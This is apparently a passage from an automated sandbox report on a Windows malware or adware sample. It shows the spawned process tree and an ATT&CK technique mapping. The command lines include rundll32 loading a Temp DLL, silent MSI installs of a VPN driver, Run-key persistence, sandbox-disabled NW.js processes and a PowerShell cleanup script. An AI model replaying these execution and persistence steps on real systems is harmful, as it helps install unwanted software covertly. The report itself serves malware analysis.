C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6152 -s 448
3⤵
- Program crash
- Enumerates system info in registry
PID:7200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 6152 -ip 6152
1⤵
PID:3784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 10092 -ip 10092
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 6264 -ip 6264
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7380

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
- Modifies data under HKEY_USERS
PID:7652

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:8928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 6488 -ip 6488
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:9256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 5532 -ip 5532
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:9912

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:2944

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
PID:10180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10180 -s 420
3⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 10180 -ip 10180
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1116

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:6536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 744 -p 8384 -ip 8384
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2920

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
PID:6056

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
- Modifies data under HKEY_USERS
PID:5688

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in Windows directory
PID:7320

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:6332

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:9656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5492 -ip 5492
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:8588

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
PID:7000

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
PID:8736

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding C794A36F9D534E6168C3C3C147B873A0 C
2⤵
PID:4600

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding F949C5C629B6659C4DA829DA2D53D4A0 C
2⤵
PID:6748

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 8544D13408A13FDE3C40648F4389E957
2⤵
PID:7436

C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe
"C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe"
2⤵
- Adds Run key to start application
PID:9808

C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\RequiredApplication_1\Settings%20Installation.exe
"C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\RequiredApplication_1\Settings%20Installation.exe" -silent=1 -CID=778 -SID=778 -submn=default
3⤵
- Adds Run key to start application
PID:4540

C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" "--ZgwMku75"
4⤵
PID:5296

C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Settings\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Settings\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Settings\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Settings\User Data" --annotation=plat=Win64 --annotation=prod=Settings --annotation=ver=0.0.13 --initial-client-data=0x208,0x204,0x200,0x20c,0x1fc,0x7ff849e5dec0,0x7ff849e5ded0,0x7ff849e5dee0
5⤵
PID:9012

C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Settings\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Settings\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Settings --annotation=ver=0.0.13 --initial-client-data=0x1b4,0x1b8,0x1bc,0x190,0x1c0,0x7ff7b3e39e70,0x7ff7b3e39e80,0x7ff7b3e39e90
6⤵
PID:3496

C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=gpu-process --field-trial-handle=1600,6333064489399122913,5091590693483067173,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5296_384211641" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1576 /prefetch:2
5⤵
PID:5136

C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1600,6333064489399122913,5091590693483067173,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5296_384211641" --mojo-platform-channel-handle=1764 /prefetch:8
5⤵
PID:2876

C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1600,6333064489399122913,5091590693483067173,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5296_384211641" --mojo-platform-channel-handle=2128 /prefetch:8
5⤵
PID:6288

C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Settings\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1600,6333064489399122913,5091590693483067173,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5296_384211641" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2192 /prefetch:1
5⤵
PID:1328

C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Settings\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1600,6333064489399122913,5091590693483067173,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5296_384211641" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2524 /prefetch:1
5⤵
PID:6372

C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=gpu-process --field-trial-handle=1600,6333064489399122913,5091590693483067173,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5296_384211641" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3024 /prefetch:2
5⤵
- Modifies registry class
PID:9604

C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1600,6333064489399122913,5091590693483067173,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5296_384211641" --mojo-platform-channel-handle=3100 /prefetch:8
5⤵
PID:8956

C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1600,6333064489399122913,5091590693483067173,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5296_384211641" --mojo-platform-channel-handle=3248 /prefetch:8
5⤵
PID:232

C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1600,6333064489399122913,5091590693483067173,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5296_384211641" --mojo-platform-channel-handle=1564 /prefetch:8
5⤵
PID:1956

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_3F61.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites' -retry_count 10"
3⤵
PID:6972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 6456 -ip 6456
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6664

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:8016

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
PID:8220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8220 -s 452
3⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 8220 -ip 8220
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:9024

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:8572

C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{65bae3f9-6c08-5245-82e7-eb671d613319}\oemvista.inf" "9" "4d14a44ff" "0000000000000140" "WinSta0\Default" "0000000000000160" "208" "c:\program files (x86)\maskvpn\driver\win764"
2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:6452

C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000140" "90c4"
2⤵
- Drops file in Drivers directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:2232

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
1⤵
PID:8724

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 9096 -ip 9096
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:8952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4896 -ip 4896
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:10224

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:2228

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
PID:7116

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7116 -s 448
3⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 7116 -ip 7116
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 6272 -ip 6272
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:8264

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
PID:2604

C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
MaskVPNUpdate.exe /silent
2⤵
- Suspicious use of SetWindowsHookEx
PID:5968

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

BITS Jobs

T1197

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

BITS Jobs

T1197

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Software Discovery

T1518

Query Registry

Virtualization/Sandbox Evasion

T1497

System Information Discovery